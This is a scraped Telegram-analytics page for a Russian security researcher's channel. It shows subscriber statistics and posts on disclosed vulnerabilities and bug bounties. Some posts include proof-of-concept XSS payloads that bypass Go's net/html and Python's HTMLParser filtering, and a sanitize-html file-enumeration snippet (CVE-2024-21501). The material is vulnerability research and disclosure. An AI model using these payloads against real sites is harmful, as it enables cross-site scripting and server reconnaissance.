fa
Feedback
Заметки Слонсера

Заметки Слонсера

رفتن به کانال در Telegram
1 565
مشترکین
-124 ساعت
+97 روز
+3030 روز

در حال بارگیری داده...

کانال‌های مشابه
ابر برچسب‌ها
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
دسامبر '24
دسامبر '24
+102
در 2 کانال‌ها
نوامبر '240
در 1 کانال‌ها
Get PRO
اکتبر '240
در 0 کانال‌ها
Get PRO
سپتامبر '24
+38
در 0 کانال‌ها
Get PRO
اوت '24
+30
در 0 کانال‌ها
Get PRO
ژوئیه '24
+58
در 0 کانال‌ها
Get PRO
ژوئن '24
+104
در 3 کانال‌ها
Get PRO
مه '24
+80
در 4 کانال‌ها
Get PRO
آوریل '24
+54
در 0 کانال‌ها
Get PRO
مارس '24
+109
در 3 کانال‌ها
Get PRO
فوریه '24
+176
در 5 کانال‌ها
Get PRO
ژانویه '24
+1 024
در 9 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
20 دسامبر+2
19 دسامبر+1
18 دسامبر0
17 دسامبر+3
16 دسامبر+2
15 دسامبر+4
14 دسامبر0
13 دسامبر0
12 دسامبر+1
11 دسامبر+12
10 دسامبر+1
پست‌های کانال
Я пропал на месяц и наверное многим будет интересно что происходило: На прошедшей конференции PHD2 я сделал доклад, в котором осветил уязвимости в C# и сервисах Microsoft. Многих заинтересовал вопрос, почему я не связался с Microsoft по этому поводу. Отвечаю: я связывался, но, к сожалению, они просто закрыли мои тикеты без объяснения причин. Уже после доклада на PHD2 я обнаружил новую технику, позволяющую отправлять письма от любого user@domain. И снова мои попытки связаться с Microsoft оказались безуспешными. Тогда я написал об этом в X(запрещенная на территории Российской Федерации социальная сеть). Пост набрал уже 120 тысяч просмотров и привлёк внимание таких изданий, как Forbes и TechCrunch и многих других. Западные СМИ начали публиковать статьи о том, как Microsoft проигнорировали мои обращения. После этого Microsoft переоткрыли тикет с последней уязвимостью и начали работу над патчем для уязвимости в C#, которая оставалась нерешённой с апреля. Вышел замечательный прецедент, как общественное давление, сопровождаемое освещением в СМИ, смогло победить некомпетентность крупного вендора.

2
https://blog.slonser.info/posts/email-attacks/ Читаем, преисполняемся Что-то мб написано криво - пишите отвечу/поменяю текст
1 447
3
Жду всех через 20 минут -_-
1 513
4
Спустя месяц затишья готов анонсировать выступление на PHD2! Вам письмо: старые новые атаки на почту 23 мая, 15:00 - 16:00 Киберфестиваль Positive Hack Days 2 Территория спортивного комплекса «Лужники» Буду рад если вы прийдете Буду выступать вместе https://t.me/hahacking, надеюсь будет очень интересно
2 360
5
Написал маленькую заметку про IPv6 Zone, существование которого многие игнорируют/не знают что это. Очень специфичная штука, но возможно кому-то поможет найти тот самый баг. https://blog.slonser.info/posts/ipv6-zones/
1 445
6
Подал окончательно заявку PHD2. Молимся, есть очень интересный (при этом простой) ресерч который хочется рассказать. Ждем отв
Подал окончательно заявку PHD2. Молимся, есть очень интересный (при этом простой) ресерч который хочется рассказать. Ждем ответа...
2 053
7
Написал мини статью про популярную библиотеку node-mysql2 - RCE (в узком случае) - Cache manipulation (в узком случае) - Prototype Pollution (в узком случае) - PP2RCE chain (в общем случае ) https://blog.slonser.info/posts/mysql2-attacker-configuration/
2 551
8
Сейчас проснулся и увидел ужасные новости, пребываю в состоянии полного шока Выражаю соболезнования всем пострадавшим, надеюсь вы и ваши близкие в безопасности У меня был билет в Москву сегодня ночью, но я решил от него отказаться - чего советую и вам Советую отказаться от посещения хоть каких-то людных мест. Будьте бдительны, надеюсь с вами и вашими близкими все будет хорошо.
3 042
9
Недавно нашел bypass всем известной библиотеки DOMPurify в одном интересном случае Сегодня вышли версии с исправлениями Прочи
Недавно нашел bypass всем известной библиотеки DOMPurify в одном интересном случае Сегодня вышли версии с исправлениями Прочитать разбор можно тут
5 357
10
CVE-2024-21501 Недавно нашел прикольную уязвимость в пакете sanitize-html В чем суть, в библиотеке часто вендора разрешают использовать атрибут style Если она используется на бекенде - возможно энумерейтить файлы системы const sanitizeHtml = require('sanitize-html'); const file_exist = <a style='background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");'>@slonser_</a>; const file_notexist = <a style='background-image: url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */");'>@slonser_</a>; const file_exist_clean = sanitizeHtml(file_exist, { allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] }, }) const file_notexist_clean = sanitizeHtml(file_notexist, { allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] }, }) console.log(file_exist_clean, "// valid file path on backend") console.log(file_notexist_clean, "// invalid file path on backend") Для существующих и не существующих файлов - получим разные выводы ( в первом случае, тэг style будет отсутствовать) Удобно для энумерации зависимостей node проекта.
2 888
11
Недавно нашел обход фильтрации тегов в golang. Для строки slon
Недавно нашел обход фильтрации тегов в golang. Для строки <a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>, golang net/html увидит следующий DOM: html head body a ->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1> То есть он будет думать что у нас есть только ссылка на google.com В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert Баг существует в последней версии golang и будет исправлен в next релизе.
7 294
12
Уже в эти выходные моя команда проводит GoldCTF 2024. Будет очень сложный Attack/Defence, приглашаю всех поучаствовать. https://ctftime.org/event/2249
4 472
13
Яндекс завел канал посвященный своему Bugbounty. Очень приятно, что люди реально использовали мою технику из доклада на Standoff Talks (кто-то даже в лс со мной советовался, всегда рад помочь) В связи с этим хочу поднять вопрос о следующем запланированном докладе - Positive Hack Days 2 Один из вариантов - рассказать про анализ безопасности веб браузеров и всего что рядом с ними ( Есть ещё один вариант, но его пока оставлю в тайне ) Что бы конкретно вам хотелось обязательно услышать в контексте такого доклада?
2 674
14
Конкурс, посвящённый поиску XSS, завершён! ✅ За этот месяц мы получили от вас почти сотню XSS. Половину уже разобрали и резол
Конкурс, посвящённый поиску XSS, завершён! ✅ За этот месяц мы получили от вас почти сотню XSS. Половину уже разобрали и резолюцию уже объявили, над второй половиной работаем :) А пока что можем поделиться промежуточными результатами: > Исследователи смогли найти способы, как добраться до httponly cookies. > Сервис-воркеры снова в моде. Похоже, потому что о них недавно были доклады на ИБ-митапах. > XSS на бескуковых доменах в совокупности с другими багами могут представлять вполне весомый импакт. Но подчеркнём: именно в совокупности. > Если вы не следите за postMessage-«трафиком» (хотя бы таким расширением), то можете упустить приличную долю находок. Спасибо всем участникам, ждём от вас новых отчётов! ⚪️
1 982
15
История одной уязвимости в Chrome Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$. Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала. Habr Twitter P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.
12 480
16
🗣 Всеволод Кокорин, SolidLab: То, что вы считаете критическим риском, может не представлять серьезной угрозы для бизнеса, и
🗣 Всеволод Кокорин, SolidLab: То, что вы считаете критическим риском, может не представлять серьезной угрозы для бизнеса, и это нормально Всеволод Кокорин (Slonser), исследователь информационной безопасности компании SolidLab, автор тг-канала «Заметки Слонсера», рассказал порталу Cyber Media о том, почему пентест — это творческая профессия, где и как искать критичные баги, а также о своем опыте в анализе защищенности.
2 082
17
Golang net/mail address spoofing Позволяет подменить адрес отправителя/получателя в электронном письме https://twitter.com/sl
Golang net/mail address spoofing Позволяет подменить адрес отправителя/получателя в электронном письме https://twitter.com/slonser_/status/1746036614508204260
2 354
18
#quick #XSS Многие забывают, что парсинг html на бекенде - довольно сложный процесс. Поэтому на уровне даже стандартных парсеров популярных языков программирования - он не реализован полностью Рассмотрим код на python: from html.parser import HTMLParser class MyHTMLParser(HTMLParser): def handle_starttag(self, tag, attrs): print(f"{tag}") for attr in attrs: print(f" ->{attr[0]}: {attr[1]}") def handle_endtag(self, tag): pass def handle_startendtag(self, tag, attrs): print(f"{tag}") for attr in attrs: print(f" ->{attr[0]}: {attr[1]}") def handle_data(self, data): pass html_string = input() parser = MyHTMLParser() parser.feed(html_string) Этот код выводит теги и их атрибуты. При этом стандартная библиотека питона не учитывает, что для тегов "iframe", "noembed", "noframes", "noscript", "plaintext", "title", "textarea", "xmp" Содержимое не обрабатывается как html теги Соответственно при вводе: <textarea><a href="x></textarea><img src=x onerror=alert()//"> Результат парсинга будет выглядеть следующим образом: textarea a ->href: x></textarea><img src=x onerror=alert()// В то время как в браузере это будет выглядеть следующим образом: <textarea>&lt;a href="x&gt;</textarea><img src="x" onerror="alert()//&quot;"> И соответсвенно выведется alert() Вещь баянистая, но многие про это забывают при той же эксплуатации Server Side XSS
6 439
19
Почистил канал и хочу его немного переформатировать Мне встречается много прикольных уязвимости и приколов - хочу как то регулярнее о них рассказывать. Если у вас есть прикольные референсы форматов - пришлите в комментарии ( буду благодарен ) Так же 25 числа заканчивается NDA на мой 0day в хроме, я думаю какой формат выбрать для публикации ( сейчас в планах просто грузануть на хабр ), если есть другие идеи реализации материала - предлагайте Ну и для закрепа: Кто я вообще такой? - Slonser - игрок команды  С4T BuT S4D, - сотрудник SolidLab, - учащийся 2 курса университета ИТМО - Гений, багбаунтер, пентестер и филантроп Правила канала: Правил нет, но если вы мне не понравитесь, я вас забаню.
1 555
20
Год начинается с репорта на 0day в net стеке голанга
Год начинается с репорта на 0day в net стеке голанга
1 588